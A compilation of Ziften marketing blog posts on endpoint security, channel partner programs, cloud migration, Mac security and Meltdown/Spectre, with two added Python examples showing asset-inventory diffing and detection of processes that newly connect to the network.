Chuck Leaver – The Improved Ziften Channel Program

Written By Greg McCreight And Presented By Chuck Leaver


If you are a reseller, integrator, distributor, or managed service provider, the brand-new Ziften Activate Partner Program is here, it’s ready to go, and it will be terrific for your profitability (and for reducing your customers’ anxiety about cybersecurity).

Ziften is 100 percent dedicated to the channel, and as we grow and progress in the market, we understand that your success is our success, and our success is your success. It shows: 96 percent of our sales in 2017 were through the channel! That’s why we built the new Activate Partner Program: to provide you the resources you need to grow your business with Ziften security services.

We kicked it all off with a highly effective, cross-platform Endpoint Detection and Response (EDR) solution, Ziften Zenith. Customers love it. Innovation partners love it. Resellers love it. The market loves it. And analysts love it.

I have to share this from the conclusion of our Broadband-Testing report, which discusses SysSecOps, or Systems Security Operations, an emerging category in which Ziften is a market leader:

Critical to Ziften’s endpoint technique in this category is total visibility – let’s face it, how can you secure what you cannot see or have no idea is there in the first place? With its Zenith platform, Ziften has a solution that ticks all the SysSecOps boxes and more …

Overall, Ziften has a really competitive offering in the extremely legitimate, emerging IT category of SysSecOps, and one that should be on the examination short-list.

By the way: Microsoft recently partnered with Ziften to produce an integration of Zenith and Microsoft Windows Defender ATP, allowing Microsoft customers to secure Linux and Mac systems from the same single pane of glass they use to secure Windows systems.

Enough about Ziften. Let’s concentrate on you, and on how you will benefit from the Activate Partner Program.

We have assembled a multi-tier partner program with improved discount rates, more resources, and strong market development support. We understand that a one-size-fits-all program does not work, not in today’s market.

With Activate, we take a hands-on approach to onboarding new partners; we make it simple for those for whom security is a relatively small part of their services; and we reward top-tier partners who have committed to Ziften.

Here’s what you get with the Activate Partner Program (and we’ll work with you to make sure that Activate fits your requirements perfectly):

Security for more of your customer’s environment: endpoints, servers, and the cloud

Visibility and security for your client’s complex, multi-cloud deployments

Simple security tool integrations to deliver genuinely custom, differentiated solutions

Hands-on, personalized assistance and life-cycle expertise

Rich financial rewards that encourage your long-term investment and reward ongoing success

Market development support to drive incremental demand and lead generation

First-rate, hands-on assistance from our field sales, sales engineers, technical support, and marketing experts

The Activate program combines our effective security services, financial investments, and hands-on assistance to help you develop more opportunities and close more deals.

Chuck Leaver – Be Prepared For Migrating Assets To The Cloud

Written By Logan Gilbert And Presented By Chuck Leaver


It bears repeating: the Internet has permanently altered the world for individuals and companies alike. For the latter, every element of modern IT is undergoing digital transformation. IT departments everywhere are under pressure to make information highly available at lower cost, all while protecting critical data from corruption, leakage, or cyber theft.

Central to this strategy is the migration of data centers to the cloud. In fact, nineteen percent of company workloads are anticipated to be in the public cloud by the end of 2019, and 50% over the next ten years.

What Is Cloud Asset Migration?

Cloud migration is the process of moving data, applications, or other business components from a company’s on-premises infrastructure to the cloud, or moving them from one cloud service to another.

The accompanying diagram illustrates this migration of file server(s), data, and application(s) from an on-premises server infrastructure to a cloud environment.

Cloud service providers make it possible for companies to move some or all of their IT infrastructure to the cloud for scale, speed, business flexibility, ease of management, and lower costs. The advantages are nothing short of compelling.

Cloud computing is changing the corporate landscape. With these technological developments, people are leaning more towards a virtual workplace, meaning that you can work from anywhere, at any time, using cloud computing.

Cloud Asset Migration Considerations

But, like any significant IT infrastructure change, a move to the cloud requires thoughtful planning and execution for the process to come in on budget and on time. Moving a server, database, application, or all of the above to the cloud is not without risk. System outages, performance degradation, data loss, and more are likely to happen as a result of misconfigurations, system failures, and security exploits.

Case in point: 43% of those who have gone through a cloud asset migration have experienced a failed or delayed application. Why? Because each asset migration is a ‘snowflake’ with its own level of complexity.

Let’s look at three considerations for a successful cloud asset migration.

1. Have a Plan

First, there has to be a strategic migration plan. That plan needs to help answer questions like the following:

Which IT assets should be migrated in the first place?
If you are moving some, or all, of your infrastructure to the cloud, how will you establish and maintain asset control?
How will you inventory what you have, before and after the move?
Do you even have to move all of it?
What comes first?

2. Clean Up What Is in Place Today

To answer these strategic questions successfully, you’ll need definitive visibility into each asset under your roof now, along with the relevant characteristics of each asset. Whether your assets today are running on physical or virtual server infrastructure, you need to know:

What assets are there now? Discover all the connected assets and determine whether they are currently managed or unmanaged.
Identify low-usage and/or unused systems. Should these systems be eliminated or repurposed prior to migration?
Identify low-usage and/or unused applications. Are these applications needed at all? Should they be removed prior to migration?
Identify and clean up duplication, be it of systems and/or applications.

Now identify the business-critical systems and applications that will be migrated as part of your plan. With this detailed asset data in hand, you can sharpen your migration strategy by segmenting what should, and should not, be migrated, or at least clearly prioritize based on business significance.

3. Prepare For Cloud Visibility Post Migration

Now that you’re equipped with thorough, precise current and historical asset data, how will you preserve this level of visibility after your successful cloud asset migration?

While the cost benefits of moving to the cloud are often extremely compelling, uncontrolled asset/virtual machine proliferation can quickly erode those cost benefits. So, before performing your cloud asset migration, ensure you have a cloud visibility solution in place that:

Discovers and monitors all connected assets throughout your single- or multi-cloud environment
Inventories, fingerprints, and categorizes discovered assets
Alerts on new or unanticipated asset discovery and/or behavior within the cloud environment
Integrates with existing ticketing, workflow, and/or CMDB systems
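The clean-up step above (find unmanaged, low-usage and duplicate assets before the move) and the post-migration visibility step (fingerprint what is discovered and alert on anything the plan did not anticipate) are both inventory comparisons, so here is one worked example that covers both. This is an added example, not Ziften’s code and not from the original post: the two inventory snapshots, the migration plan, the port-to-category table and the thresholds are all constructed stand-ins for what a discovery tool would return.

```python
"""Inventory-driven checks for a cloud asset migration (added example).

Not Ziften's code. Two constructed inventory snapshots stand in for what a
discovery tool would return: the pre-migration snapshot drives the clean-up
step (unmanaged, low-usage and duplicate assets); the post-migration snapshot
is diffed against the migration plan to alert on unexpected or missing assets.
"""
from collections import defaultdict

# Hypothetical service fingerprints: listening port -> asset category.
PORT_ROLES = {445: "file-server", 139: "file-server", 5432: "database",
              3306: "database", 1433: "database", 80: "web", 443: "web"}

# Constructed sample: an on-premises discovery pass before the move.
PRE_MIGRATION = [
    {"id": "fs-01",  "ports": [445],     "managed": True,  "avg_cpu": 35, "idle_days": 1},
    {"id": "fs-02",  "ports": [445],     "managed": True,  "avg_cpu": 2,  "idle_days": 120},
    {"id": "db-01",  "ports": [5432],    "managed": True,  "avg_cpu": 60, "idle_days": 0},
    {"id": "web-01", "ports": [80, 443], "managed": False, "avg_cpu": 20, "idle_days": 3},
    {"id": "lab-07", "ports": [],        "managed": False, "avg_cpu": 1,  "idle_days": 400},
]
# Constructed: the assets the migration plan says should exist in the cloud.
MIGRATION_PLAN = {"fs-01", "db-01", "web-01"}
# Constructed: a cloud discovery pass after the move.
POST_MIGRATION = [
    {"id": "fs-01",      "ports": [445],     "managed": True,  "avg_cpu": 30, "idle_days": 1},
    {"id": "db-01",      "ports": [5432],    "managed": True,  "avg_cpu": 55, "idle_days": 0},
    {"id": "web-01",     "ports": [80, 443], "managed": True,  "avg_cpu": 22, "idle_days": 1},
    {"id": "web-01-tmp", "ports": [80],      "managed": False, "avg_cpu": 0,  "idle_days": 0},
]


def fingerprint(asset):
    """Categorize an asset from its listening ports; 'unknown' if none match."""
    roles = {PORT_ROLES[p] for p in asset["ports"] if p in PORT_ROLES}
    return "/".join(sorted(roles)) if roles else "unknown"


def unmanaged(inventory):
    """Discovered assets that no management agent or owner covers."""
    return sorted(a["id"] for a in inventory if not a["managed"])


def low_usage(inventory, cpu_pct=5, idle_days=90):
    """Decommission/repurpose candidates: near-idle CPU and no recent logins."""
    return sorted(a["id"] for a in inventory
                  if a["avg_cpu"] < cpu_pct and a["idle_days"] >= idle_days)


def duplicates(inventory):
    """Assets that share a category, i.e. candidates for consolidation."""
    groups = defaultdict(list)
    for a in inventory:
        role = fingerprint(a)
        if role != "unknown":
            groups[role].append(a["id"])
    return {role: sorted(ids) for role, ids in groups.items() if len(ids) > 1}


def diff_against_plan(pre, post, plan):
    """Compare discovered cloud assets with the plan and with the old estate."""
    pre_ids = {a["id"] for a in pre}
    post_ids = {a["id"] for a in post}
    return {
        "unexpected": sorted(post_ids - plan),  # discovered, never planned: alert
        "missing": sorted(plan - post_ids),     # planned, not discovered: migration gap
        "retired": sorted(pre_ids - plan),      # on-prem assets the plan does not carry over
    }


def alerts(pre, post, plan):
    """Ticket-style records a CMDB or ticketing integration could consume."""
    d = diff_against_plan(pre, post, plan)
    out = [{"severity": "high", "asset": i, "reason": "unplanned cloud asset"} for i in d["unexpected"]]
    out += [{"severity": "high", "asset": i, "reason": "planned asset not found"} for i in d["missing"]]
    out += [{"severity": "medium", "asset": i, "reason": "unmanaged in cloud"} for i in unmanaged(post)]
    return out


if __name__ == "__main__":
    print("unmanaged before move:", unmanaged(PRE_MIGRATION))
    print("low-usage candidates:", low_usage(PRE_MIGRATION))
    print("duplicate roles:", duplicates(PRE_MIGRATION))
    print("plan diff:", diff_against_plan(PRE_MIGRATION, POST_MIGRATION, MIGRATION_PLAN))
    for a in alerts(PRE_MIGRATION, POST_MIGRATION, MIGRATION_PLAN):
        print("ALERT", a)
```

On the sample data the pre-migration pass flags `fs-02` and `lab-07` as idle (and `fs-02` as a duplicate file server), which is exactly the clean-up decision the plan has to make before anything moves; afterwards, `web-01-tmp` shows up in the cloud with no entry in the plan, which is the “new or unanticipated asset” alert the visibility solution is supposed to raise and hand to ticketing.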

Cloud Visibility and Security with Ziften

Continuous cloud visibility into each device, user, and application means you can administer all parts of your infrastructure more effectively. You’ll avoid wasting resources by preventing VM sprawl, plus you’ll have an in-depth body of data to satisfy audit requirements for NIST 800-53, HIPAA, and other compliance regulations.

Follow the above when you migrate to the cloud, and you’ll stay away from weak security, incomplete compliance, and operational SNAFUs. Ziften’s approach to cloud visibility and security gives you the intelligence you need for cloud asset migration without the difficulties.

Chuck Leaver – Great Security Opportunity For Microsoft Channel Partners

Written By Greg McCreight And Presented By Chuck Leaver


Windows Defender Advanced Threat Protection (WDATP) is very good, and popular with Microsoft channel partners around the world. Chances are you’re already working with Microsoft clients to set up and look after WDATP on their Windows endpoints.

I’m thrilled to tell you about a new opportunity: get a fast start with an industry-leading solution that integrates right into WDATP, Ziften Zenith. For a limited time, Microsoft channel partners can use our brand-new “Fast Start” program to collaborate with Ziften.

With “Fast Start,” you enjoy all the benefits of Ziften’s top-tier partner status for a full year, and we’ll help you get up and running quickly with joint market and business development resources, and with a waiver of the usual sales volume commitment associated with Gold Status.

If you don’t know Ziften, we provide infrastructure visibility and coordinated threat detection, prevention, and response across all endpoint devices and cloud environments. Zenith, our flagship security platform, deploys easily to client devices, servers, and virtual machines.

Once installed, Zenith continuously collects all the information needed to properly assess the current and historical state of all managed devices, including system, user behavior, network connection, application, binary, and process data. Zenith gives your clients’ IT and security teams constant visibility and control of all managed assets, including continuous monitoring, alerting, and automated or manual actions.

Zenith is cross-platform: it operates with and safeguards Windows, Mac, Linux, and other endpoints.

What’s especially notable, and here’s the opportunity, is that Ziften has worked with Microsoft to integrate Zenith with Windows Defender ATP. That means your customers can use WDATP on Windows systems and Zenith on their macOS and Linux systems to detect, view, and respond to cyberattacks, all using just the WDATP Management Console for all the systems. Zenith runs hidden in the background.

A single pane of glass to manage Windows, Mac, and Linux endpoints, which can include desktops, notebooks, and servers. That makes Zenith an ideal solution to offer your existing WDATP clients… and makes your bids for new WDATP business more comprehensive for multi-platform prospects.

Furthermore, offering Zenith can help you speed client migrations to Windows 10, and sell more Enterprise E5 commercial editions.

“Fast Start” with Gold Status for a Year

Ziften is absolutely focused on the channel: 96% of our sales in 2017 were through the channel. We are delighted to bring the “Fast Start” program to existing Microsoft channel partners, anywhere in the world.

With “Fast Start,” you can sign up for the Ziften Channel Program with these advantages:

Expedited Approval and On-Boarding – Ziften channel managers and field sales work directly with you to get you up and running offering the Zenith endpoint security solution integrated with Windows Defender ATP.

Superior Security Value – You’ll be uniquely positioned to provide clients and prospects greater security value across more of their overall environment than ever, increasing the range of supported and secured Windows, Mac, and Linux systems.

Hands-On Collaboration – Ziften dedicates field sales, sales engineers, and marketing to support your daily pre-sales engagements, drive new sales opportunities, and help close more deals with Microsoft and Ziften endpoint security.

Here’s what one major Microsoft channel partner says about this. This is Ronnie Altit, founder and CEO of Insentra, a “partner-obsessed” Australian IT services company that works solely through the IT channel:

“As a large Microsoft reseller, teaming with Ziften to provide their Zenith security platform integrated with Microsoft Windows Defender ATP was a no-brainer. We’re thrilled at the seamless integration between Zenith and Windows Defender ATP giving our customers holistic protection and visibility throughout their Windows and non-Windows systems. Ziften has actually been a pleasure to work with, and helpful at every step of the procedure. We expect to be exceptionally successful offering this powerful security service to our clients.”

Chuck Leaver – The Girl Scouts Are Raising The Profile Of Women In Cybersecurity

Written By Kim Foster And Presented By Chuck Leaver


It’s clear that cybersecurity is getting more international attention than ever before, and businesses are rightfully worried about whether they are training enough security specialists to meet growing security threats. While this concern is felt across the commercial world, few people anticipated that the Girl Scouts would hear the call.

Beginning this fall, countless Girl Scouts nationwide have the chance to earn cybersecurity badges. Girl Scouts of the USA teamed up with security company (and Ziften technology partner) Palo Alto Networks to create a curriculum that teaches girls the essentials of computer security. According to Sylvia Acevedo, CEO of GSUSA, they developed the program based on demand from the girls themselves to protect themselves, their computers, and their household networks.

The timing is good, given that according to a study released in 2017 by (ISC)², 1.8 million cybersecurity positions will be unfilled by 2022. Combine increased demand for security pros with stagnant growth for women (only 11 percent for the past several years) and our cybersecurity staffing difficulties are poised to get worse without a significant effort by the industry toward better inclusion.

Obviously, we can’t rely on the Girl Scouts to do all the heavy lifting. Broader educational efforts are a given: according to the Computing Technology Industry Association, 69% of U.S. women who do not have a career in information technology cited not knowing what opportunities were available to them as the reason they did not pursue one. One of the great untapped opportunities of our industry is the recruitment of more diverse professionals. Targeted educational programs and increased awareness must be a high priority. Raytheon’s Women’s Cyber Security Scholarship is a fine example.

To reap the rewards of having women invested in shaping the future of technology, it is important to dispel the exclusionary perception of “the boys’ club” and remember the groundbreaking contributions made by women of the past. Many people know that the first computer programmer was a woman, Ada Lovelace. Then there is the work of other well-known leaders such as Grace Hopper, Hedy Lamarr, or Ida Rhodes, all of whom may stir some vague recollection among those in our industry. Female mathematicians produced programs for one of the world’s first fully electronic general-purpose computers: Kay McNulty, Jean Jennings Bartik, Betty Snyder, Marlyn Meltzer, Fran Bilas, and Ruth Lichterman were just a few of the original programmers of the Electronic Numerical Integrator and Computer (better known as ENIAC), though their important work was not widely recognized for over half a century. In fact, when historians first discovered photos of the women in the mid-1980s, they mistook them for “Refrigerator Ladies,” models posing in front of the machines.

It’s worth noting that many believe the same “boys’ club” mentality that neglected the accomplishments of women in history has led to restricted leadership positions and lower wages for contemporary women in cybersecurity, along with outright exclusion of female experts from speaking opportunities at industry conferences. As trends go, excluding brilliant people with relevant knowledge from influencing the cybersecurity industry is an unsustainable one if we wish to keep up with the bad guys.

Whether or not we collectively take action to promote more inclusive workplaces, by educating, hiring, and promoting women in larger numbers, it is heartening to see an organization synonymous with fundraiser cookies successfully alert an entire industry to the fact that girls are really interested in the field. As the Girl Scouts of today are given the tools to pursue a career in information security, we should expect that they will become the very women who eventually reprogram our expectations of what a cybersecurity professional looks like.

Chuck Leaver – A Mac Is A Security Risk Too

Written By Roark Pollock And Presented By Chuck Leaver


Got Macs? Great. I have one too. Have you locked your Macs down? If not, your enterprise has a potentially major security weakness.

It’s a misconception to believe that Macintosh computers are inherently secure and don’t need to be protected against malware or hacking. Many believe Macs are arguably more secure than Windows desktops and notebooks, due to the design of the Unix-derived kernel. Certainly, we see fewer security patches issued for macOS by Apple than security patches for Windows from Microsoft.

Fewer security defects is not zero defects. And safer doesn’t mean 100% safe.

Some Mac Vulnerability Examples

Take, for example, the macOS 10.13.3 update, released on January 23, 2018, for the current versions of the Mac’s operating system. Like most current computers running Intel processors, the Mac was susceptible to the Meltdown flaw, which meant that malicious applications might be able to read kernel memory.

Apple needed to patch this flaw, as well as numerous others.

For instance, another issue could allow malicious audio files to execute arbitrary code, which might compromise the system’s security integrity. Apple had to patch it.

A kernel flaw meant that a malicious application might be able to execute arbitrary code with kernel privileges, giving attackers access to anything on the device. Apple needed to patch the kernel.

A flaw in the WebKit library meant that processing maliciously crafted web content might result in arbitrary code execution. Apple had to patch WebKit.

Another flaw meant that processing a malicious text message might result in application denial of service, freezing the system. Whoops. Apple had to patch that flaw as well.

Don’t Make The Same Errors as Consumers

Many consumers, believing all the hype about how wonderful macOS is, opt to run without protection, relying on macOS and its built-in application firewall to block all manner of bad code. Bad news: there’s no built-in antivirus or anti-malware, and the firewall can only do so much. And many businesses choose to overlook macOS when it comes to visibility for posture tracking and hardening, and threat detection/threat hunting.

Consumers often make these assumptions because they don’t know any better. IT and security professionals should never make the same mistakes; we should know better.

If a Mac user installs bad software, adds a malicious browser extension, opens a bad email attachment, or clicks a phishing link or a nasty ad, their machine is compromised, just like a Windows computer. Within the enterprise, we need to be prepared to handle these issues, Mac computers included.

What To Do?

What do you need to do?

– Install antivirus and anti-malware on corporate Mac computers, or on any Mac that has access to your organization’s content, servers, or networks.
– Track the state of Macs, just as you would with Windows computers.
– Be proactive in applying patches and fixes to Mac computers, again, just as with Windows.

You should also remove from your corporate environment any Macs that are old and cannot run the most recent version of macOS. That still leaves a lot of them, since Apple is pretty good at supporting old hardware. Here is Apple’s list of Mac models that can run macOS 10.13:

– MacBook (Late 2009 or newer)
– MacBook Pro (Mid 2010 or newer)
– MacBook Air (Late 2010 or newer)
– Mac mini (Mid 2010 or newer)
– iMac (Late 2009 or newer)
– Mac Pro (Mid 2010 or newer)

When the next version of macOS comes out, some of your older devices might fall off the list. They ought to fall off your inventory as well.

Ziften’s Perspective

At Ziften, with our Zenith security platform, we strive to maintain visibility and security feature parity between Windows, macOS, and Linux-based systems.

In fact, we have partnered with Microsoft to integrate our Zenith security platform with Microsoft Windows Defender Advanced Threat Protection (ATP) for macOS and Linux monitoring and threat detection and response coverage. The integration makes it possible for customers to detect, view, investigate, and respond to advanced cyber-attacks on macOS computers (as well as Windows and Linux-based endpoints) directly within the Microsoft WDATP Management Console.

From our perspective, it has always been important to give your security teams confidence that every desktop and laptop endpoint is protected, and therefore that the enterprise is protected.

It can be hard to believe, but 91% of businesses state they have some Mac computers. If those computers aren’t protected, and properly integrated into your endpoint security systems, the enterprise is not secured. It’s just that simple.

Chuck Leaver – The Advantages Of The Security Industry Working Together

Written By Chuck Leaver

No one can solve cybersecurity alone. No single solution provider, no single vendor, no one can take on the whole thing. Tackling security requires cooperation between different companies.

In some cases, those players are at different levels of the solution stack: some install on endpoints, some within applications, others within network routers, others at the telco or in the cloud.

Sometimes, those companies each have a particular best-of-breed piece of the puzzle: one player focuses on e-mail, others on crypto, others on disrupting the kill chain.

From the enterprise customer’s point of view, effective security requires assembling a set of tools and services into a working whole. From the vendors’ viewpoint, effective security requires strategic alliances. Sure, each vendor, whether making hardware, writing software, or offering services, has its own products and intellectual property. Nevertheless, we all work better when we work together to enable integrations and make life easy for our resellers, our integrators, and the end customer.

Paradoxically, not only can vendors make more money through strategic alliances, but end customers save money at the same time. Why? A number of reasons.

Customers don’t waste their money (and time) on products with overlapping capabilities. Customers don’t need to waste money (and time) creating custom integrations. And customers won’t waste money (and time) trying to debug systems that fight each other, such as by triggering extra notifications or hard-to-find incompatibilities.

The Ultimate Trifecta – Products, Solutions, and Channels

All three work together to meet the needs of the business customer, as well as benefit the vendors, who can concentrate on doing what they do best, relying on strategic alliances to build complete solutions from jigsaw puzzle pieces.

Generally speaking, those solutions require more than simple APIs, which is where strategic alliances come in.

Think about the integration between products (like a network threat scanner or Ziften’s endpoint visibility solutions) and analytics solutions. End customers don’t want to run a whole load of different dashboards, and they don’t want to manually correlate anomaly findings from a lot of different security tools. Strategic alliances between product vendors and analytics solutions, whether on-site or in the cloud, make sense for everybody. That includes the channel, who can sell and support complete solutions that are already dialed in, already debugged, already documented, and will work with the least hassle possible.

Or think about the integration of solutions and managed security services providers (MSSPs). They want to offer prospective clients pre-packaged solutions, ideally ones that can run in their multi-tenant clouds. That means the products need to be scalable, with synergistic license terms. They must be well integrated with the MSSP’s existing dashboards and administrative control systems. And naturally, they have to feed into predictive analytics and incident response programs. The best way to do that? Through strategic alliances, both horizontally with other solution vendors and with major MSSPs as well.

How about major value-added resellers (VARs)? VARs require solutions that are simple to understand, easy to support, and easy to add into existing security deployments. This makes new solutions more attractive, more cost-effective, simpler to set up, and easier to support, and it strengthens the VAR’s client relationships.

What do they look for when adding to their solution portfolio? New products that have strategic alliances with their existing product offerings. If you don’t dovetail into the VAR’s portfolio partners, well, you probably don’t dovetail.

Two Examples: Fortinet and Microsoft

No one can solve cybersecurity alone, and that includes giants like Fortinet and Microsoft.

Consider the Fortinet Fabric-Ready Partner Program, where technology alliance partners integrate with the Fortinet Security Fabric by means of Fabric APIs and are able to actively collect and share information to enhance threat intelligence, boost overall threat awareness, and broaden threat response from end to end. As Fortinet explains in its Fortinet Fabric-Ready Partner Program overview, “partner inclusion in the program signals to customers and the industry as a whole that the partner has actually teamed up with Fortinet and leveraged the Fortinet Fabric APIs to develop verified, end-to-end security options.”

Likewise, Microsoft is pursuing a similar approach with the Windows Defender Advanced Threat Protection program. Microsoft recently admitted just a few key partners into this security program, saying, “We’ve spoken with our customers that they desire protection and visibility into possible hazards on all their device platforms and we’ve relied on partners to assist address this need. Windows Defender ATP provides security groups a single pane of glass for their endpoint security and now by working together with these partners, our customers can extend their ATP service to their entire install base.”

We’re the first to admit: Ziften cannot solve security alone. No one can. The best way forward for the security industry is to move forward together, through strategic alliances combining product vendors, service providers, and the channel. That way we all win: vendors, service providers, channel partners, and business customers alike.

Chuck Leaver – Why You Must Have Flexibility With SysSecOps

Written by Chuck Leaver


You will find that endpoints are everywhere. The device you are reading this on is an endpoint, whether it’s a desktop, notebook, tablet, or phone. The HVAC controller for your building is an endpoint, assuming it’s connected to a network, and so are the WiFi access points and the security cameras. So is the connected vehicle. So are the web servers, storage servers, and Active Directory servers in the data center. So are your IaaS/PaaS services in the cloud, where you control bare-metal servers, VMware virtual machines, or containers running on Windows and/or Linux.

All of them are endpoints, and each and every one is important to manage.

They have to be managed from the IT side (by IT administrators, who ideally have appropriate IT-level visibility of each connected thing, like those security cameras). That management means making sure they’re connected to the right network zones or VLANs, that their software and configurations are up to date, that they’re not flooding the network with bad packets due to electrical faults, and so on.

Those endpoints also need to be managed from the security perspective by CISO teams. Every endpoint is a potential entrance into the business network, which means the devices must be locked down: default passwords never used, all security patches applied, no unapproved software installed on the device’s embedded web server. (Krebs outlines how, in 2014, hackers got into Target’s network via its HVAC system.)

Systems and Security Operations

Systems Security Operations, or SysSecOps, brings those two worlds together. With the right kind of SysSecOps mindset, and tools that support the correct workflows, IT and security staff get the same data and can collaborate. Sure, they each have different tasks, and react differently to problem alerts, but they’re all managing the same endpoints, whether in the pocket, on the desk, in the utility closet, in the data center, or in the cloud.

Ziften Zenith Test Report

We were thrilled when the recently released Broadband-Testing report praised Zenith, Ziften’s flagship endpoint security and management platform, as ideal for this kind of situation. To quote from the report, “With its Zenith platform, Ziften has a solution that ticks all the SysSecOps boxes and more. Because its definition of ‘endpoints’ extends into the Data Centre (DC) and the world of virtualisation, it is true blanket protection.”

Broadband-Testing is an independent testing facility and service based in Andorra. They describe themselves as follows: “Broadband-Testing communicates with suppliers, media, investment groups and VCs, experts and consultancies alike. Testing covers all elements of networking hardware and software, from ease of use and performance, through to progressively important aspects such as device power intake measurement.”

Back to flexibility. With endpoints everywhere (again, on the desk, in the utility closet, in the data center, or in the cloud), a SysSecOps-based endpoint security and management system should go everywhere and do anything, at scale. Broadband-Testing wrote:

“The configuration/deployment options and architecture of Ziften Zenith permit a really flexible implementation, on or off-premise, or hybrid. Agent deployment is simplicity itself with zero user requirements and no endpoint invasion. Agent footprint is also very small, unlike numerous endpoint security services. Scalability also looks to be excellent – the most significant customer implementation to date is in excess of 110,000 endpoints.”

We can’t help but be proud of Zenith, and of what Broadband-Testing concluded:

“The introduction of SysSecOps – integrating systems and security operations – is an uncommon moment in IT; a hype-free, common-sense approach to refocusing on how systems and security are managed inside a business.

Key to Ziften’s endpoint approach in this category is total visibility – after all, how can you protect what you can’t see or don’t know exists in the first place? With its Zenith platform, Ziften has a product that ticks all the SysSecOps boxes and more.

Deployment is simple, especially in a cloud-based scenario as evaluated. Scalability also looks to be excellent – the largest customer implementation to date is in excess of 110,000 endpoints.

Data analysis options are comprehensive, with a huge amount of information available from the Ziften console – a single view of the whole endpoint infrastructure. Any object can be analysed – e.g. binaries, applications, systems – and, from a process, an action can be defined as an automated function, such as quarantining a system in the event of a potentially harmful binary being found. Several reports are predefined covering all aspects of analysis. Alerts may be set for any occurrence. Furthermore, Ziften provides the concept of extensions for customised data collection, beyond the reach of most vendors.

And with its External API functionality, endpoint data gathered by Ziften can be shared with most third-party applications, thus adding more value to a client’s existing security and analytics infrastructure investment.

Overall, Ziften has a very competitive offering in what is a truly worthwhile and emerging IT category in SysSecOps, and one that is highly deserving of evaluation.”

We hope you’ll consider an evaluation of Zenith, and will agree that when it comes to SysSecOps and endpoint security and management, we do tick all the boxes with the true blanket coverage that both your IT and CISO teams have been looking for.

Chuck Leaver – Ziften Can Assist With Meltdown And Spectre

Written By Josh Harriman And Presented By Chuck Leaver

 

Ziften is aware of the latest vulnerabilities affecting practically everyone who uses a computer or digital device. While that is a very broad statement, we at Ziften are working diligently to help our customers find vulnerable assets, patch those vulnerable systems, and monitor systems after the fix for potential performance problems.

This is an ongoing investigation by our team in Ziften Labs, where we keep up to date on the latest malicious attacks as they develop. Today, most of the conversation is around PoC (proof of concept) code and what can in theory happen. This will quickly change as attackers take advantage of these opportunities. The vulnerabilities I’m speaking of, of course, are Meltdown and Spectre.

Much has been written about how these vulnerabilities were found and what the industry is doing to find workarounds for these hardware issues. To learn more, I feel it’s appropriate to go straight to the source (https://spectreattack.com/).

What Do You Need To Do, and How Can Ziften Help?

A key area where Ziften helps in the event of an attack by either method is monitoring for data exfiltration. Since these attacks essentially read data the attacker should not have access to, we believe the first and simplest way to protect yourself is to take this confidential data and remove it from these systems (bear in mind that these attacks read memory, so a secret is exposed for as long as any process on the host holds it, not only while it sits on disk). This data might be passwords, login credentials, or even security keys for SSH or VPN access.

Ziften monitors and alerts when processes that typically do not make network connections begin exhibiting this unusual behavior. From these alerts, users can quarantine systems from the network and/or kill the processes involved. Ziften Labs is monitoring the development of the attacks related to these vulnerabilities that are likely to appear in the wild, so we can better protect our customers.
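The detection described above, "a process that never talked to the network starts doing so", comes down to a baseline of which images were seen running and which of them ever opened an outbound connection, then comparing new telemetry against it. The following is an added example written for this page, not Ziften code and not the Zenith API; the event records, host names, image paths and addresses are constructed for illustration.

```python
"""Baseline-driven detection of processes that start making network
connections.  Added example with constructed telemetry; it is not
Ziften code and does not use the Zenith API."""
from __future__ import annotations
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    host: str
    image: str          # full image path as reported by the sensor
    kind: str           # "start" = process launched, "connect" = outbound socket
    remote: str = ""    # "ip:port" for connect events


def image_name(path: str) -> str:
    """Normalise a Windows or POSIX path to a lower-case file name."""
    return path.replace("\\", "/").lower().rsplit("/", 1)[-1]


class ProcessNetworkBaseline:
    """Learn which images ran and which of them ever connected out."""

    def __init__(self, baseline: list[Event]) -> None:
        self.ran: set[str] = set()
        self.connected: set[str] = set()
        for ev in baseline:
            name = image_name(ev.image)
            self.ran.add(name)
            if ev.kind == "connect":
                self.connected.add(name)

    def evaluate(self, window: list[Event]) -> list[dict]:
        """Return one alert per (host, image, remote) that deviates from baseline."""
        alerts: list[dict] = []
        seen: set[tuple[str, str, str]] = set()
        for ev in window:
            if ev.kind != "connect":
                continue
            name = image_name(ev.image)
            if name in self.connected:
                continue                  # a process that normally talks; nothing new
            key = (ev.host, name, ev.remote)
            if key in seen:
                continue                  # collapse repeated connections into one alert
            seen.add(key)
            if name in self.ran:
                severity = "high"         # known-quiet process is now talking out
                reason = "process ran during baseline but never connected"
            else:
                severity = "medium"       # never-seen binary; unknown, not yet proven bad
                reason = "process not observed during baseline"
            alerts.append({"host": ev.host, "process": name, "remote": ev.remote,
                           "severity": severity, "reason": reason})
        return alerts


def quarantine_candidates(alerts: list[dict]) -> set[str]:
    """Hosts worth isolating from the network: any high-severity deviation."""
    return {a["host"] for a in alerts if a["severity"] == "high"}


# Constructed baseline window: browsers and service hosts talk, editors do not.
BASELINE = [
    Event("ws01", r"C:\Program Files\Google\Chrome\Application\chrome.exe", "start"),
    Event("ws01", r"C:\Program Files\Google\Chrome\Application\chrome.exe", "connect", "142.250.72.14:443"),
    Event("ws01", r"C:\Windows\System32\notepad.exe", "start"),
    Event("ws02", r"C:\Windows\System32\svchost.exe", "connect", "10.0.0.5:135"),
    Event("ws02", r"C:\Windows\System32\calc.exe", "start"),
]

# Constructed detection window after a suspected leak.
WINDOW = [
    Event("ws01", r"C:\Program Files\Google\Chrome\Application\chrome.exe", "connect", "142.250.72.14:443"),
    Event("ws01", r"C:\Windows\System32\notepad.exe", "connect", "203.0.113.10:443"),
    Event("ws01", r"C:\Windows\System32\notepad.exe", "connect", "203.0.113.10:443"),  # duplicate, collapsed
    Event("ws03", r"C:\Users\bob\AppData\Local\Temp\dumper.exe", "connect", "203.0.113.10:443"),
    Event("ws02", r"C:\Windows\System32\calc.exe", "start"),
]


def run_demo() -> list[dict]:
    return ProcessNetworkBaseline(BASELINE).evaluate(WINDOW)


if __name__ == "__main__":
    found = run_demo()
    for alert in found:
        print(alert)
    print("quarantine:", sorted(quarantine_candidates(found)))
```

The two severities matter in practice: a binary that was present and quiet throughout the baseline and suddenly connects is the stronger signal (it is how a post-exploitation tool living in a trusted process looks), while a brand-new image is merely unknown and usually needs a hash or signer check before anyone pulls a host off the network.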

Discover – How am I Susceptible?

Let’s look at areas we can monitor for vulnerable systems. Zenith, Ziften’s flagship product, can easily and quickly find operating systems that need to be patched. Although these vulnerabilities are in the CPUs themselves (Intel, AMD and ARM), the fixes that will be available are delivered as updates to the operating system and, in some cases, to the web browser you use as well.

